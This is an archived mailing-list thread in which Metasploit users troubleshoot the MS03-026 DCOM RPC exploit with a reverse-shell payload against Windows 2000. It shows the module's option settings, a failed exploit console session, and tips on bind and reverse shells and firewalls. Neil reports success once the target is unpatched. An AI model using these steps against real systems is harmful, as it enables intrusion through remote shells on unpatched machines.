Re: usefulness of this tool

[neil-on-metasploit at restricted.dyndns.org (Neil)]

He Jose, 

I got this working now after installing a fresh copy of windows 2000. This 
means that the server I have doesn't have any patches at all. 

Jose Alejandro Sanchez Ortega writes: 

> And ... my contrib for this issue: 
>
> Exploit and Payload Options
> =========================== 
>
>   Exploit:    Name      Default         Description
>   --------    ------    ------------    ------------------
>   required    RPORT     135             The target port
>   required    RHOST     172.16.25.18    The target address 
>
>   Payload:    Name        Default         Description
>   --------    --------    ------------    
> ------------------------------------------
>   required    LPORT       4321            Local port to receive connection
>   required    LHOST       172.16.25.27    Local address to receive 
> connection
>   optional    EXITFUNC    seh             Exit technique: "process", 
> "thread", "seh" 
>
>   Target: Windows NT SP6/2K/XP ALL 
>
> msf msrpc_dcom_ms03_026(win32_reverse) > check
> [*] No check has been implemented for this module
> msf msrpc_dcom_ms03_026(win32_reverse) > exploit
> [*] Starting Reverse Handler.
> [*] Connected to REMACT with group ID 0x10823b
> [*] Exiting Reverse Handler. 
>
> msf msrpc_dcom_ms03_026(win32_reverse) > 
>
>
> Where is the shell?? ... 
>
> I am sure the service is running and not blocking the ports! 
>
>
> > Hi, (and welcome) 
> >
> > take a look on this MSF Video Tutorial: 
> >
> > http://wired.s6n.com/files/jathias/framework2.2-tut.rar
> > Windows Player:
> > http://wired.s6n.com/files/jathias/CamPlay.zip 
> >
> > If you use a bind_shell payload, make sure that you don't block the 
> > return port or adress (any FW in the pc you use for the attack?) 
> >
> > Regards,
> > Jerome ATHIAS
> > ------------------------